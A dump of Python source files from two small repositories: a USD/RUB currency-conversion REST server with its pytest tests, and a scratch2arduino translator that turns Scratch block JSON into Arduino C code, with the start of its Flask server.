    """Per-poll server hook (HTTPServer.service_actions); intentionally a no-op."""
def usd_rub(handler):
    """PUT /usd-rub handler: convert an amount between USD and RUB.

    Expects a JSON body {"initial_currency": "USD"|"RUB", "initial_amount": int}
    read via handler.get_payload(); returns a JSON-serializable dict with
    either the conversion result or an {"error": ...} payload.
    """
    payload = handler.get_payload()
    initial_currency = payload['initial_currency']
    init_amount = payload['initial_amount']
    exchange_rate = get_exchange_rate()
    try:
        init_amount = int(init_amount)
    except (TypeError, ValueError):
        # narrowed from a bare except: only conversion failures are expected
        error = "Please provide initial amount as integer"
        logger.info(f'initial_currency: {initial_currency}, init_amount:{init_amount} '
                    f'exchange_rate:{exchange_rate}')
        return ({"error": error})
    if initial_currency == 'USD':
        final_currency = 'RUB'
        final_amount = init_amount * exchange_rate
    elif initial_currency == 'RUB':
        final_currency = 'USD'
        final_amount = init_amount * 1 / exchange_rate
    else:
        error = "Incorrect initial currency. Allowed are USD, RUB"
        logger.info(f'initial_currency: {initial_currency}, init_amount:{init_amount} '
                    f'exchange_rate:{exchange_rate}')
        return ({"error": error})
    # BUG FIX: build the response locally instead of mutating the module-level
    # `success_response` dict, which leaked state between requests.
    response = {
        "initial_currency": initial_currency,
        "init_amount": init_amount,
        "exchange_rate": exchange_rate,
        "final_currency": final_currency,
        "final_amount": final_amount,
    }
    logger.info(f'initial_currency: {initial_currency}, init_amount:{init_amount} '
                f'exchange_rate:{exchange_rate}, final_currency:{final_currency}, final_amount:{final_amount} ')
    return response
# Route table: path regex -> {HTTP method: handler, 'media_type': content type}.
routes = {
    r'^/usd-rub': {'PUT': usd_rub, 'media_type': 'application/json'},
}
# serve_forever() poll interval, in seconds
poll_interval = 0.1
def rest_call_json(url, payload=None, with_payload_method='PUT'):
    'REST call with JSON decoding of the response and JSON payloads'
    # NOTE(review): when payload is falsy the function falls through and
    # returns None -- there is no GET branch here; confirm that is intended.
    if payload:
        if not isinstance(payload, str):
            payload = json.dumps(payload)
        # PUT or POST
        response = urllib.request.urlopen(
            MethodRequest(url, payload.encode(), {'Content-Type': 'application/json'}, method=with_payload_method))
        response = response.read().decode()
        return json.loads(response)
class MethodRequest(urllib.request.Request):
    """urllib Request that lets the caller force the HTTP method via method=.

    See: https://gist.github.com/logic/2715756
    """

    def __init__(self, *args, **kwargs):
        # pop method= before delegating; Request's __init__ doesn't take it
        # in the Python versions this pattern targets
        if 'method' in kwargs:
            self._method = kwargs['method']
            del kwargs['method']
        else:
            self._method = None
        return urllib.request.Request.__init__(self, *args, **kwargs)

    def get_method(self, *args, **kwargs):
        # BUG FIX: the original fallback called urllib.request.get_method,
        # which does not exist (AttributeError whenever no method= was
        # supplied). Defer to the base class instead.
        if self._method is not None:
            return self._method
        return urllib.request.Request.get_method(self, *args, **kwargs)
class RESTRequestHandler(http.server.BaseHTTPRequestHandler):
    """Dispatches incoming requests against the module-level `routes` table."""

    def __init__(self, *args, **kwargs):
        self.routes = routes
        return http.server.BaseHTTPRequestHandler.__init__(self, *args, **kwargs)

    def do_PUT(self):
        self.handle_method('PUT')

    def get_payload(self):
        """Read Content-Length bytes from the request body and JSON-decode them."""
        payload_len = int(self.headers.get('content-length', 0))
        payload = self.rfile.read(payload_len)
        payload = json.loads(payload.decode())
        return payload

    def handle_method(self, method):
        """Route the request: 404 for unknown paths, 405 for unsupported
        methods, otherwise call the handler and JSON-encode its return value."""
        route = self.get_route()
        if route is None:
            self.send_response(404)
            self.end_headers()
            self.wfile.write('Route not found\n'.encode())
        else:
            if method in route:
                content = route[method](self)
                if content is not None:
                    self.send_response(200)
                    if 'media_type' in route:
                        self.send_header('Content-type', route['media_type'])
                    self.end_headers()
                    if method != 'DELETE':
                        self.wfile.write(json.dumps(content).encode())
                else:
                    self.send_response(404)
                    self.end_headers()
                    self.wfile.write('Not found\n'.encode())
            else:
                self.send_response(405)
                self.end_headers()
                # BUG FIX: in the original, .encode() bound only to the
                # string literal, producing str + bytes (TypeError) on every
                # 405. Encode the whole concatenated message.
                self.wfile.write((method + ' is not supported\n').encode())

    def get_route(self):
        # first regex in the table that matches the request path wins
        for path, route in self.routes.items():
            if re.match(path, self.path):
                return route
        return None
def rest_server(port):
    'Starts the REST server'
    http_server = http.server.HTTPServer(('', port), RESTRequestHandler)
    # service_actions runs between serve_forever() polls
    http_server.service_actions = service_worker
    print('Starting HTTP server at port %d' % port)
    try:
        # blocks until KeyboardInterrupt
        http_server.serve_forever(poll_interval)
    except KeyboardInterrupt:
        pass
    print('Stopping HTTP server')
    http_server.server_close()
def main(argv):
    # argv is accepted for symmetry with sys.argv slicing but unused;
    # the port is fixed at 8080.
    rest_server(8080)
if __name__ == '__main__':
    main(sys.argv[1:])
|
{"/http_api_currency_exchange.py": ["/exchange_rate_parser.py"]}
|
28,000
|
codelooper75/simple_currency_converter_api
|
refs/heads/main
|
/tests.py
|
import urllib.request
import json
import sys
import pytest
# correct_request_payload = {"usd_summ": 1430}
def make_request(payload):
    """PUT `payload` as JSON to the local /usd-rub endpoint; return the raw response.

    Requires the API server from http_api_currency_exchange.py to be running
    on localhost:8080.
    """
    myurl = "http://localhost:8080/usd-rub"
    req = urllib.request.Request(myurl, method='PUT')
    req.add_header('Content-Type', 'application/json; charset=utf-8')
    jsondata = json.dumps(payload)
    jsondataasbytes = jsondata.encode('utf-8')   # needs to be bytes
    req.add_header('Content-Length', len(jsondataasbytes))
    response = urllib.request.urlopen(req, jsondataasbytes)
    return response
def test_status_code_equals_200():
    """A well-formed conversion request succeeds with HTTP 200."""
    response = make_request ({"initial_currency":"RUB", "initial_amount":1000})
    assert response.getcode() == 200
def test_check_content_type_equals_json():
    """Responses are served with the JSON media type."""
    response = make_request ({"initial_currency":"RUB", "initial_amount":1000})
    assert response.headers['Content-Type'] == "application/json"
def test_check_incorrect_initial_currency():
    """An unknown currency code yields the API's error payload."""
    response = make_request ({"initial_currency":"RUBs", "initial_amount":1000})
    byte_f = response.read()
    json_f = json.loads(byte_f.decode('utf-8'))
    assert json_f['error'] == "Incorrect initial currency. Allowed are USD, RUB"
def test_belivable_rate():
    """Sanity-check the scraped USD->RUB rate is in a plausible range."""
    response = make_request ({"initial_currency":"USD", "initial_amount":1})
    byte_f = response.read()
    json_f = json.loads(byte_f.decode('utf-8'))
    exchange_rate = json_f['exchange_rate']
    assert exchange_rate > 0 and exchange_rate < 1000
|
{"/http_api_currency_exchange.py": ["/exchange_rate_parser.py"]}
|
28,004
|
cproctor/scratch2arduino
|
refs/heads/master
|
/scratch_blocks.py
|
import re
import json
from random import randint
# Define:
# blocks are sequences of statements that stick together.
# statements are represented by vertical levels in a script.
# expressions are within statements, and evaluate to a value.
def clean_name(name):
    """Converts a name to a canonical camelCase identifier.

    Lower-cases, strips Scratch's %n placeholders and any character that is
    not a letter or a space, collapses whitespace, then joins the words with
    every word after the first capitalized.
    """
    name = name.lower()
    name = re.sub('%n', '', name)
    name = name.strip()
    name = re.sub(r'\s+', ' ', name)
    name = re.sub('[^a-zA-Z ]', '', name)
    tokens = name.split()
    # BUG FIX (Python 3): `list + map(...)` raises TypeError because map()
    # returns an iterator, not a list. Build the capitalized tail as a list.
    tokens = tokens[0:1] + [t.capitalize() for t in tokens[1:]]
    return "".join(tokens)
class BlockNotSupportedError(Exception):
    """Raised when a Scratch script or statement has no Arduino translation."""
    pass
class ScratchRepresentation(object):
    """Base class for every parsed Scratch construct.

    Subclasses override parse() and to_arduino(); `indent` controls how many
    `indent_chars` units indented() prepends to emitted lines.
    """
    arduino_rep = "(Representation of Scratch code)"
    indent=0
    indent_chars = " " * 2
    def __init__(self, rep_json):
        self.parse(rep_json)
    def parse(self, rep_json):
        pass
    def __repr__(self):
        return self.to_arduino()
    def __str__(self):
        return "<ScratchRepresentation>"
    def to_arduino(self):
        # NOTE(review): *self.__dict__ unpacks the attribute NAMES (dict
        # iteration) as positional format args -- confirm this is intended.
        return self.arduino_rep.format(*self.__dict__)
    def indented(self, string):
        return "{}{}".format(self.indent_chars * self.indent, string)
class ScratchScript(ScratchRepresentation):
    """One top-level Scratch script: an (x, y, blocks) triple from the project JSON."""
    def __init__(self, script_json, indent=0, namespace=None):
        self.indent = indent
        self.name = None
        self.parse(script_json)
    def __str__(self):
        return "<ScratchScript {}>".format(self.name)
    def __repr__(self):
        return "<ScratchScript {}>".format(self.name)
    def parse(self, script_json):
        pass
    def to_arduino(self):
        return self.indented("(SCRIPT)")
    @classmethod
    def instantiate(cls, script_json):
        # factory: pick the right subclass for this script and construct it
        return cls.identify(script_json)(script_json)
    @classmethod
    def identify(cls, script_json):
        """Map the script's first block signature onto a ScratchScript subclass."""
        x, y, block_json = script_json
        signature = block_json[0]
        try:
            return SCRIPT_IDENTIFIERS[signature[0]]
        except KeyError:
            raise BlockNotSupportedError(
                "Scripts of type {} are not supported".format(signature[0]))
class NullScript(ScratchScript):
    """A script that translates to a placeholder with no real Arduino output."""

    def to_arduino(self):
        # BUG FIX: the original left the string as a bare expression and
        # implicitly returned None; return the placeholder text instead.
        return "(NULL SCRIPT)"
class Function(ScratchScript):
    """A Scratch custom block (procedure) emitted as a C `void` function."""
    def __init__(self, script_json, indent=0, namespace=None, signature=None):
        self.indent = indent
        # an explicit signature dict (name/arg_names/arg_types) overrides parsing
        if signature:
            self.signature = signature
        self.parse(script_json)
    def __str__(self):
        return "<Function {}>".format(self.name)
    def parse(self, script_json):
        x, y, block_json = script_json
        if hasattr(self, "signature"):
            # caller-supplied names are used verbatim (EventBinding relies on this)
            self.name = self.signature['name']
            self.arg_names = self.signature['arg_names']
            self.arg_types = self.signature['arg_types']
        else:
            # first entry of the script is the procedure definition header
            signature_json = block_json[0]
            _, self.name, self.arg_names, self.arg_types, _ = signature_json
            self.name = clean_name(self.name)
            self.arg_names = [clean_name(arg) for arg in self.arg_names]
        # the remaining entries form the function body
        description_json = block_json[1:]
        self.block = ScratchCodeBlock(description_json, indent=self.indent + 1)
    def to_arduino(self):
        return "\n".join([
            self.indented("void {} ({}) {{".format(self.name, self.args_to_arduino())),
            self.block.to_arduino(),
            self.indented("}")
        ])
    def args_to_arduino(self):
        """Render the argument list; only Scratch numeric args (type code 1) map to int."""
        def arduino_type(symbol):
            if symbol == 1:
                return "int"
            else:
                raise BlockNotSupportedError(
                    "Functions with arg type {} are not yet supported".format(symbol))
        arduino_args = []
        for i, arg in enumerate(self.arg_names):
            arduino_args.append("{} {}".format(
                arduino_type(self.arg_types[i]),
                arg
            ))
        return ", ".join(arduino_args)
class EventBinding(ScratchScript):
    """A `when I receive <event>` hat block: a generated zero-argument
    function plus a dispatcher.bind() call tying it to the event."""
    def parse(self, script_json):
        x, y, block_json = script_json
        signature_json = block_json[0]
        self.get_fn_name(signature_json)
        self.name = "Event binding for {}".format(self.event_name)
        # wrap the rest of the script in a no-argument function
        self.fn = Function(script_json, indent=self.indent, signature={
            "name": self.fn_name,
            "arg_names": [],
            "arg_types": []
        })
    def get_fn_name(self, signature_json):
        """Derive event_name and a randomized, collision-resistant fn_name."""
        identifier, self.event_name = signature_json
        self.event_name = clean_name(self.event_name)
        self.fn_id = randint(0, 100000)
        self.fn_name = "{}_function_{}".format(self.event_name, self.fn_id)
    def to_arduino(self):
        # emit the function followed by the bind() that hooks it to the event
        return "\n".join([
            self.fn.to_arduino(),
            self.indented("dispatcher.bind({}, {});".format(self.event_name, self.fn_name))
        ])
    def __str__(self):
        return "<EventBinding {} -> {}>".format(self.event_name, self.fn_name)
class GreenFlag(EventBinding):
    """Event binding for Scratch's green-flag hat block."""

    def get_fn_name(self, signature_json):
        # The green flag carries no event name of its own; use a fixed one.
        self.event_name = "green_flag"
        self.fn_id = randint(0, 100000)
        self.fn_name = "{}_function_{}".format(self.event_name, self.fn_id)
class ScratchCodeBlock(ScratchRepresentation):
    "Represents a code block: an ordered list of statements"

    def __init__(self, code_block_json, indent=0):
        self.indent = indent
        self.statements = []
        for statement_json in code_block_json:
            self.statements.append(
                ScratchStatement.instantiate(statement_json, indent=self.indent))

    def to_arduino(self):
        # render each statement and drop any empty outputs before joining
        rendered = (statement.to_arduino() for statement in self.statements)
        return "\n".join(line for line in rendered if line)
class ScratchStatement(ScratchRepresentation):
    "Represents one line in a Scratch script, including any nested blocks"
    arduino_rep = "(STATEMENT)"
    def __init__(self, statement_json, indent=0):
        self.indent = indent
        self.parse(statement_json)
    def to_arduino(self):
        return self.indented(self.arduino_rep.format(*self.__dict__))
    @classmethod
    def instantiate(cls, statement_json, indent=0):
        "Returns an instance of the appropriate class"
        return cls.identify(statement_json)(statement_json, indent=indent)
    @classmethod
    def identify(cls, statement_json):
        "Given valid JSON for a statement, will return the appropriate class"
        try:
            # the first element of the statement JSON names the block type
            identifier = statement_json[0]
            return STATEMENT_IDENTIFIERS[identifier]
        except KeyError:
            raise BlockNotSupportedError("No statement matches {}".format(identifier))
class SetVar(ScratchStatement):
    """Scratch `set <var> to <value>` -> C assignment statement."""

    def parse(self, statement_json):
        raw_name = statement_json[1]
        raw_value = statement_json[2]
        self.var_name = clean_name(raw_name)
        self.set_value = ScratchExpression.instantiate(raw_value)

    def to_arduino(self):
        assignment = "{} = {};".format(self.var_name, self.set_value.to_arduino())
        return self.indented(assignment)
class ChangeVarBy(ScratchStatement):
    """Scratch `change <var> by <delta>` -> `var = var + delta;`."""

    def parse(self, statement_json):
        raw_name = statement_json[1]
        raw_delta = statement_json[2]
        self.var_name = clean_name(raw_name)
        self.change_value = ScratchExpression.instantiate(raw_delta)

    def to_arduino(self):
        delta = self.change_value.to_arduino()
        line = "{} = {} + {};".format(self.var_name, self.var_name, delta)
        return self.indented(line)
class SetListItemValue(ScratchStatement):
    """Scratch `replace item <i> of <list> with <value>` -> array element assignment."""

    def parse(self, statement_json):
        self.index = ScratchExpression.instantiate(statement_json[1])
        self.array_name = clean_name(statement_json[2])
        self.value = ScratchExpression.instantiate(statement_json[3])

    def to_arduino(self):
        assignment = "{}[{}] = {};".format(
            self.array_name, self.index.to_arduino(), self.value.to_arduino())
        return self.indented(assignment)
class Broadcast(ScratchStatement):
    """Scratch `broadcast <message>` -> dispatcher.broadcast(...) call."""
    # TODO It will be necessary to provide a dispatcher!

    def parse(self, statement_json):
        self.broadcast_token = clean_name(statement_json[1])

    def to_arduino(self):
        call = "dispatcher.broadcast({});".format(self.broadcast_token)
        return self.indented(call)
class Wait(ScratchStatement):
    """Scratch `wait <secs>` -> delay() with the seconds scaled to milliseconds."""

    def parse(self, statement_json):
        self.duration = ScratchExpression.instantiate(statement_json[1])

    def to_arduino(self):
        millis = "({}) * 1000".format(self.duration.to_arduino())
        return self.indented("delay({});".format(millis))
class DoIf(ScratchStatement):
    """Scratch `if <cond> then` -> a C if block."""

    def parse(self, statement_json):
        self.condition = ScratchExpression.instantiate(statement_json[1])
        self.block = ScratchCodeBlock(statement_json[2], indent=self.indent+1)

    def to_arduino(self):
        header = self.indented("if ({}) {{".format(self.condition.to_arduino()))
        footer = self.indented("}")
        return "\n".join([header, self.block.to_arduino(), footer])
class DoIfElse(ScratchStatement):
    """Translates Scratch's "if/else" block into a C if/else statement."""
    def parse(self, statement_json):
        self.condition = ScratchExpression.instantiate(statement_json[1])
        self.if_block = ScratchCodeBlock(statement_json[2], indent=self.indent + 1)
        self.else_block = ScratchCodeBlock(statement_json[3], indent=self.indent + 1)
    def to_arduino(self):
        pieces = [
            self.indented("if ({}) {{".format(self.condition.to_arduino())),
            self.if_block.to_arduino(),
            self.indented("} else {"),
            self.else_block.to_arduino(),
            self.indented("}"),
        ]
        return "\n".join(pieces)
class DoRepeat(ScratchStatement):
    """Translates "repeat <n>" into a C for loop with a random counter name."""
    def parse(self, statement_json):
        self.repeats = ScratchExpression.instantiate(statement_json[1])
        self.block = ScratchCodeBlock(statement_json[2], indent=self.indent + 1)
        # The random suffix avoids name collisions between nested/sibling loops.
        self.counter_name = "counter_{}".format(randint(0,100000))
    def to_arduino(self):
        c = self.counter_name
        header = "for (int {} = 0; {} < {}; {}++) {{".format(
            c, c, self.repeats.to_arduino(), c)
        return "\n".join([
            self.indented(header),
            self.block.to_arduino(),
            self.indented("}"),
        ])
class DoForever(ScratchStatement):
    """Translates Scratch's "forever" into an infinite while loop."""
    def parse(self, statement_json):
        self.block = ScratchCodeBlock(statement_json[1], indent=self.indent + 1)
    def to_arduino(self):
        lines = [
            self.indented("while (true) {"),
            self.block.to_arduino(),
            self.indented("}"),
        ]
        return "\n".join(lines)
class ScratchExpression(ScratchRepresentation):
    """ Represents an expression that evaluates to a number, string, or boolean.
    In Scratch, these will be shaped as hexagons or rounded rectangles. """
    arduino_rep = "(EXPRESSION)"
    @classmethod
    def instantiate(cls, exp_json):
        "Build and return an expression instance of the appropriate subclass."
        return cls.identify(exp_json)(exp_json)
    @classmethod
    def identify(cls, exp_json):
        """Map expression JSON (a literal, or an [operator, args...] list)
        to the class that translates it.

        Raises BlockNotSupportedError for unknown operator identifiers.
        """
        # BUG FIX: `basestring` does not exist on Python 3; fall back to `str`
        # so the module runs on both interpreters.
        try:
            string_types = basestring
        except NameError:
            string_types = str
        if isinstance(exp_json, string_types):
            # NOTE(review): this pattern also matches "" and "." — LiteralNumber
            # would then raise ValueError; presumably such input never occurs.
            if re.match(r"^-?[0-9\.]*$", exp_json):
                return LiteralNumber
            else:
                return LiteralString
        elif isinstance(exp_json, (int, float)):
            return LiteralNumber
        else:
            # BUG FIX: subscript hoisted out of the try so a KeyError from
            # exp_json itself can no longer leave `identifier` unbound.
            identifier = exp_json[0]
            try:
                return EXPRESSION_IDENTIFIERS[identifier]
            except KeyError:
                raise BlockNotSupportedError("No expression matches {}".format(identifier))
class Literal():
    """Base for literal values; JSON rendering doubles as C-style source text."""
    def parse(self, value):
        self.value = value
    def to_arduino(self):
        rendered = json.dumps(self.value)
        return rendered
class LiteralString(ScratchExpression):
    """A string literal; json.dumps supplies the C-style quoting/escaping."""
    def parse(self, value):
        self.value = value
    def to_arduino(self):
        quoted = json.dumps(self.value)
        return quoted
class LiteralNumber(ScratchExpression):
    """A numeric literal; string inputs are coerced to int, then float."""
    def parse(self, value):
        if isinstance(value, (int, float)):
            self.value = value
            return
        # Prefer an int when the text parses as one, otherwise fall back
        # to float (e.g. "3.5").
        try:
            self.value = int(value)
        except ValueError:
            self.value = float(value)
    def to_arduino(self):
        return json.dumps(self.value)
class BinaryOperator(ScratchExpression):
    """Base for infix operators; subclasses set `operator` to the C symbol."""
    operator = "(SYMBOL)"
    def parse(self, exp_json):
        # Expression shape: [identifier, left-operand, right-operand].
        self.arg1 = ScratchExpression.instantiate(exp_json[1])
        self.arg2 = ScratchExpression.instantiate(exp_json[2])
    def to_arduino(self):
        left = self.arg1.to_arduino()
        right = self.arg2.to_arduino()
        return "({} {} {})".format(left, self.operator, right)
# Concrete binary operators: each maps one Scratch block to its C symbol.
class Equals(BinaryOperator):
    operator = "=="
class Add(BinaryOperator):
    operator = "+"
class Subtract(BinaryOperator):
    operator = "-"
class Multiply(BinaryOperator):
    operator = "*"
class Divide(BinaryOperator):
    operator = "/"
class Modulo(BinaryOperator):
    operator = "%"
class GreaterThan(BinaryOperator):
    operator = ">"
class LessThan(BinaryOperator):
    operator = "<"
class And(BinaryOperator):
    operator = "&&"
class ReadVar(ScratchExpression):
    """Reads a variable; optionally validated against a namespace.

    Overrides __init__ (rather than parse) so it can accept the extra
    namespace argument.
    """
    def __init__(self, exp_json, namespace=None):
        self.varName = clean_name(exp_json[1])
        if namespace and self.varName not in namespace:
            message = "{} is not a variable in {}".format(self.varName, namespace)
            raise ValueError(message)
    def to_arduino(self):
        return self.varName
class KeyPressed(ScratchExpression):
    "NOT REALLY SUPPORTED"
    def parse(self, exp_json):
        self.key = exp_json[1]
    def to_arduino(self):
        # Always-false placeholder; keyboard input has no Arduino equivalent.
        return '(false == "{} KEY PRESSED")'.format(self.key)
class GetParam(ScratchExpression):
    """Reads a custom-block parameter; optionally validated against a namespace.

    Overrides __init__ (rather than parse) so it can accept the extra
    namespace argument.
    """
    def __init__(self, exp_json, namespace=None):
        self.varName = clean_name(exp_json[1])
        if namespace and self.varName not in namespace:
            message = "{} is not a parameter in {}".format(self.varName, namespace)
            raise ValueError(message)
    def to_arduino(self):
        return self.varName
class RandomFromTo(ScratchExpression):
    """Translates "pick random <a> to <b>" into Arduino's random(a, b)."""
    def parse(self, exp_json):
        # NOTE(review): the raw JSON values are kept (not wrapped as
        # expressions); presumably these are always literals — confirm.
        self.fromVal = exp_json[1]
        self.toVal = exp_json[2]
    def to_arduino(self):
        return "random({}, {})".format(self.fromVal, self.toVal)
class Call(ScratchStatement):
    """Translates a custom-block invocation into a C function call."""
    def parse(self, statement_json):
        # Statement shape: [identifier, function-name, arg, arg, ...].
        self.function_name = clean_name(statement_json[1])
        self.args = [ScratchExpression.instantiate(a) for a in statement_json[2:]]
    def to_arduino(self):
        rendered_args = ", ".join(a.to_arduino() for a in self.args)
        return self.indented("{}({});".format(self.function_name, rendered_args))
class NullStatement(ScratchStatement):
    """A statement deliberately dropped from the translation (emits None)."""
    def to_arduino(self):
        return None
# NOTE(review): every entry is commented out and nothing in this module reads
# this table — it appears to be kept only as a historical reference.
BLOCK_IDENTIFIERS = {
    # 'procDef' : Function,
    # '=' : OpEq,
    # '>' : OpGt,
    # '<' : OpLt,
    # '+' : OpPlus,
    # '-' : OpMinus,
    # '*' : OpTimes,
    # '/' : OpDiv,
    # '%' : OpMod,
    # 'getParam' : ParamGet,
    # 'readVariable': VarGet,
}
# Maps a Scratch statement identifier (the first element of its JSON array)
# to the class that translates it; consumed by ScratchStatement.identify.
STATEMENT_IDENTIFIERS = {
    'doIf' : DoIf,
    'doRepeat' : DoRepeat,
    'doForever' : DoForever,
    'call' : Call,
    'doIfElse' : DoIfElse,
    'setVar:to:': SetVar,
    'changeVar:by:': ChangeVarBy,
    'setLine:ofList:to:': SetListItemValue,
    'broadcast:': Broadcast,
    'wait:elapsed:from:': Wait,
    # These have effects that don't map to Arduino
    # Currently, we just trash them.
    'hide' : NullStatement,
    "createCloneOf" : NullStatement,
    "doWaitUntil" : NullStatement,
    "lookLike:" : NullStatement,
    "setGraphicEffect:to:" : NullStatement,
    "gotoX:y:" : NullStatement,
    # Can't do these properly yet.
    # Need to fake dynamic arrays...
    "deleteLine:ofList:" : NullStatement,
    "append:toList:" : NullStatement,
}
# Maps a Scratch expression identifier to the class that translates it;
# consumed by ScratchExpression.identify.
EXPRESSION_IDENTIFIERS = {
    "=" : Equals,
    "+" : Add,
    "-" : Subtract,
    "*" : Multiply,
    "/" : Divide,
    "%" : Modulo,
    ">" : GreaterThan,
    "<" : LessThan,
    "readVariable" : ReadVar,
    "getParam" : GetParam,
    "keyPressed:" : KeyPressed,
    "randomFrom:to:": RandomFromTo,
    "&" : And
}
# Maps hat-block identifiers to script classes (defined earlier in this file).
SCRIPT_IDENTIFIERS = {
    "procDef" : Function,
    "whenIReceive" : EventBinding,
    "whenGreenFlag" : GreenFlag,
    "createCloneOf" : NullScript,
    "whenCloned" : NullScript,
    "think:" : NullScript
}
|
{"/scratch_object.py": ["/scratch_blocks.py"]}
|
28,005
|
cproctor/scratch2arduino
|
refs/heads/master
|
/test/test_translator.py
|
# Smoke test: translate sample expressions, statements, scripts, and a whole
# project, printing the generated Arduino code for manual inspection.
from translator import *
import json

with open('test_cases.json') as testfile:
    test_data = json.load(testfile)

for exp_json in test_data['expressions']:
    print("EXPRESSION: {}".format(exp_json))
    print(ScratchExpression.instantiate(exp_json).to_arduino())

for st_json in test_data['statements']:
    print("STATEMENT: {}".format(st_json))
    print(ScratchStatement.instantiate(st_json).to_arduino())

for script_json in test_data['scripts']:
    print("SCRIPT: {}".format(script_json))
    print(ScratchScript.instantiate(script_json).to_arduino())

with open('sample_project.json') as projectfile:
    project_json = json.load(projectfile)

project = ScratchObject(project_json)
script = project.get_script("instructions_for_each_update")
print(script.to_arduino())
|
{"/scratch_object.py": ["/scratch_blocks.py"]}
|
28,006
|
cproctor/scratch2arduino
|
refs/heads/master
|
/scratch_object.py
|
# NOTE: This is not very general-purpose yet...
# Have the app ping the CDN every 30 seconds; track when the student clicks for an update as well.
# Check for when a program's hash changes.
from scratch_blocks import *
# Maps Python runtime type names to the Arduino/C type used when emitting state.
TYPE_TRANSLATIONS = {
    "int": "int",
    "str": "String",
    "unicode": "String",
    "float": "float"
}
class ScratchObject(object):
    """Wraps the JSON of a Scratch project/sprite: variables, lists, scripts,
    and child objects, plus helpers to emit Arduino state declarations."""
    def __init__(self, object_json):
        # Only the top-level project JSON carries info.projectID.
        if object_json.get('info', {}).get('projectID'):
            self.project_id = object_json.get('info').get('projectID')
        else:
            self.project_id = None
        self.name = object_json.get('objName')
        self.state = {}               # cleaned var/list name -> initial value
        self.scripts = []             # ScratchScript instances
        self.children = []            # nested ScratchObjects (sprites)
        self.translation_errors = []  # warnings collected during translation
        for var in object_json.get('variables', []):
            self.state[clean_name(var['name'])] = var['value']
        for lis in object_json.get('lists', []):
            self.state[clean_name(lis['listName'])] = lis['contents']
        for script_json in object_json.get('scripts', []):
            self.scripts.append(ScratchScript.instantiate(script_json))
        for child_json in object_json.get('children', []):
            # Children without objName (e.g. stage monitors) are skipped.
            if child_json.get('objName'):
                self.children.append(ScratchObject(child_json))
    def __str__(self):
        return "<ScratchObject {}>".format(self.name)
    def __repr__(self):
        return "<ScratchObject {}>".format(self.name)
    def is_a_project(self):
        "True when this object is a top-level project (has a project ID)."
        return self.project_id is not None
    def get_script(self, script_name):
        "Return the first script (own or a child's) with this name, else None."
        for script in self.get_scripts():
            if script.name == script_name:
                return script
    def get_scripts(self):
        "All scripts belonging to this object and its direct children."
        all_scripts = []
        all_scripts += self.scripts
        for child in self.children:
            all_scripts += child.scripts
        return all_scripts
    def get_state(self):
        "Merged state dict; a child's value overrides the parent's on clash."
        state = {}
        state.update(self.state)
        for child in self.children:
            state.update(child.get_state())
        return state
    def state_to_arduino(self, exclude=None, include=None, indent=0):
        """Emit one C declaration per state entry, joined by newlines.

        exclude: names to skip; include: if given, only these names are kept;
        indent: number of leading spaces on every emitted line.
        """
        translations = []
        if not exclude:
            exclude = []
        for key, val in self.get_state().items():
            if (key in exclude) or (include and (key not in include)):
                continue
            if isinstance(val, list):
                # Infer the array element type from the members' Python types.
                type_sigs = list(set(type(i).__name__ for i in val))
                if len(type_sigs) == 1:
                    type_sig = type_sigs[0]
                elif len(type_sigs) == 0:
                    type_sig = 'int'
                    self.warn("Could not infer type for empty list {}".format(key))
                else:
                    # Mixed element types: arbitrarily use the first and warn.
                    type_sig = type_sigs[0]
                    self.warn("Not all items in list {} are of type {}".format(key, type_sig))
                translations.append("{} {}[{}] = {{ {} }};".format(
                    TYPE_TRANSLATIONS[type_sig],
                    clean_name(key), len(val), ", ".join(json.dumps(v) for v in val)
                ))
            else:
                type_sig = type(val).__name__
                translations.append("{} {} = {};".format(
                    TYPE_TRANSLATIONS[type_sig], key, json.dumps(val)
                ))
        return "\n".join(" " * indent + t for t in translations)
    def warn(self, warning):
        "Record a non-fatal translation problem."
        self.translation_errors.append(warning)
|
{"/scratch_object.py": ["/scratch_blocks.py"]}
|
28,007
|
cproctor/scratch2arduino
|
refs/heads/master
|
/scratch2arduino_server.py
|
# Note: log everything in sqlite!
from flask import Flask
from scratch_object import *
import requests
import json
from jinja2 import Environment, FileSystemLoader
from os.path import dirname, realpath
import traceback
import logging
import datetime
# Append-only request log; requires write access to /var/log.
log = logging.getLogger(__name__)
handler = logging.FileHandler("/var/log/scratch2arduino.log")
log.addHandler(handler)
log.setLevel(logging.INFO)
class NotFoundError(Exception):
    "Raised when the Scratch CDN reports an unknown project ID."
    pass
# Jinja templates are looked up next to this file.
env = Environment(loader=FileSystemLoader(dirname(realpath(__file__))))
program_template = env.get_template("neopixel_template.html")
base_template = env.get_template("base_template.html")
landing_template = env.get_template("landing_template.html")
app = Flask(__name__)
# Variable names stripped from the generated state declarations
# (passed as exclude= to ScratchObject.state_to_arduino below).
excluded_vars = [
    "acceleration",
    "colorOffset",
    "isMoving",
    "howManyLights",
    "mainColor",
    "mainColorValue",
    "lightColor",
    "myLightNumber",
    "lightMode",
    "secondColorValue",
    "lightIndex",
    "secondColor",
    "ready",
    "changeInAcceleration",
    "speed"
]
# Script names never emitted as helper functions (see include_script).
excluded_scripts = [
    "waitATick",
    "setLightToRgb",
    "findMainAndSecondColors",
    "loop",
    "setup",
    "findColorOffset",
    "turnOffLight",
    "turnOnLight",
    "setupLights",
    "scaleColorValues",
    "reset"
]
def include_script(script):
    """Decide whether a script should be emitted as a helper function.

    Skips unnamed scripts, scripts on the exclusion list, and event bindings.
    """
    if not script.name or script.name in excluded_scripts:
        return False
    return not isinstance(script, EventBinding)
def change_indent(code, spaces):
    """Shift every line of `code` by `spaces` columns.

    Positive values prepend that many spaces; negative values strip that many
    leading characters from each line (assumed to be indentation).
    """
    lines = code.split("\n")
    if spaces > 0:
        shifted = [(" " * spaces) + line for line in lines]
    else:
        shifted = [line[-spaces:] for line in lines]
    return "\n".join(shifted)
# We mocked reading the motion sensor with a variable. Time to undo that.
# The patches below rewrite "isMoving"/"acceleration" variable accesses into
# real motionSensor calls, and flip `motion_sensor` on when a project uses them.
motion_sensor = False
unpatched_to_arduino = Equals.to_arduino
def patched_to_arduino(self):
    # Special-case (isMoving == "YES"/"NO") comparisons into sensor calls.
    special_case = False
    if (isinstance(self.arg1, ReadVar) and self.arg1.varName == "isMoving"):
        special_case = True
        val = self.arg2
    if (isinstance(self.arg2, ReadVar) and self.arg2.varName == "isMoving"):
        special_case = True
        val = self.arg1
    if special_case and isinstance(val, LiteralString):
        if val.value == "YES":
            return "motionSensor.moving()"
        else:
            return "!motionSensor.moving()"
    else:
        return unpatched_to_arduino(self)
